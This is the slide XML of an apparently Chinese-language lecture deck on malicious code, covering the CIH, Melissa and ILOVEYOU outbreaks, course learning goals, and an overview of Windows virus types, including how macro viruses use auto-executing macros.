          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>月，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>版</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>日，台湾少量发作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>日，全球发作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破坏主板</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BIOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37892" name="Picture 4" descr="CIH">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EE11062-307C-4EE9-AA36-4121422E4A96}"/>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582738" y="2335213"/>
            <a:ext cx="2930525" cy="3597275"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>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5B0AD03-DB8D-4B9B-8413-F2CD7E0F800A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>美丽莎” 介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EDFCE68-F23E-4A09-9BFA-8080BADB4466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716463" y="1981200"/>
            <a:ext cx="4275137" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>大卫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>史密斯，美国新泽西州工程师</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>小时内席卷全球互联网 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>至少造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>亿美元的损失！ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>传播规模（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>次方，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>为传播的次数）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39940" name="Picture 4" descr="melisa">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A0A730-21C1-4268-B4ED-B5A73D9DAE3D}"/>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647825" y="2335213"/>
            <a:ext cx="2733675" cy="3400425"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91C4A44-FE81-40A7-A729-9FFD25AD9112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>教学目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44E372D0-D500-4901-A8E2-8F99A1FF024F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了解恶意代码的定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>掌握恶意代码的分类方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了解每一类恶意代码的典型破坏功能，以及对电脑用户的威胁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了解杀毒软件基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击基本原理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F207C38-5C00-42E3-AC58-9F7BC4326B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>爱虫病毒介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5EE4D09-AB78-4D43-A8BA-72175E29F17A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5253038" y="1981200"/>
            <a:ext cx="3738562" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>菲律宾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>AMA”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>电脑大学计算机系的学生</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>一个星期内就传遍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>大洲 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>微软、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>Intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>等在内的大型企业网络系统瘫痪 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>全球经济损失达几十亿美元 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 4" descr="爱虫病毒作者">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11283836-2DC1-4FBB-B026-6AECABC5D95C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1471613" y="2428875"/>
            <a:ext cx="3268662" cy="2435225"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>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02A9CA64-FC54-40CF-A3F3-9FA8BDFA6997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018907AD-8223-45FD-BCDE-5BD072D63F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44036" name="Picture 5" descr="autodog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA97E4B4-E0FC-4C8B-BB9B-C65F075E98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6288" y="1641475"/>
            <a:ext cx="6194425"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22FCCBD1-DA80-443D-9AD3-60BC9E161260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E56E51-705E-4D8A-9C1F-00707B79AFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46084" name="Picture 4" descr="熊猫">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C1E9C0-CAC8-44F8-B944-05A269265CE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0"/>
            <a:ext cx="1516063"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2935E872-92E7-490C-BB19-0769C9DBFD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8150" y="2060575"/>
            <a:ext cx="30337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46086" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AAFDB2D-5008-48B2-A003-D7FEEE5C16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9825" y="2060575"/>
            <a:ext cx="379888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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB20DA9E-EA04-4C87-8317-F65C9C08842B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>下的病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F7F6B2-1EC5-44FB-99A8-344198F04862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>典型病毒种类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>宏病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>脚本病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>Win32 PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>病毒</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0BAA8CC-CB41-40E7-907C-E6B7E2790CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>宏病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B13C26-6982-4668-8B24-C1BBF9411E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2133600"/>
            <a:ext cx="7772400" cy="4135438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>利用如下自动执行宏，将病毒代码写在如下宏中，由于这些宏会自动执行，因此获取控制权。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49156" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE0417B-B2FA-47CD-9E68-36BD8C6AB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352800"/>
            <a:ext cx="71628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矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1CCA578-BC55-4F58-A8B0-66800123CE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="1773238"/>
            <a:ext cx="7543800" cy="353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a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>宏（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>macro)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，就是软件设计者为了在使用软件工作时，避免一再的重复相同的动作而设计出来的一种工具。它利用简单的语法，把常用的动作写成宏，当再工作时，就可以直接利用事先写好的宏自动运行，去完成某项特定的任务，而不必再重复相同的动作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253EB03E-2840-4943-B160-82B84C11C032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="342900"/>
            <a:ext cx="7543800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是宏？</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3C74C10D-5C79-4F35-8B5F-B93CA0B7A12D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宏语言</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AABEA9A3-F8E9-48AB-9144-4F3333CA5792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
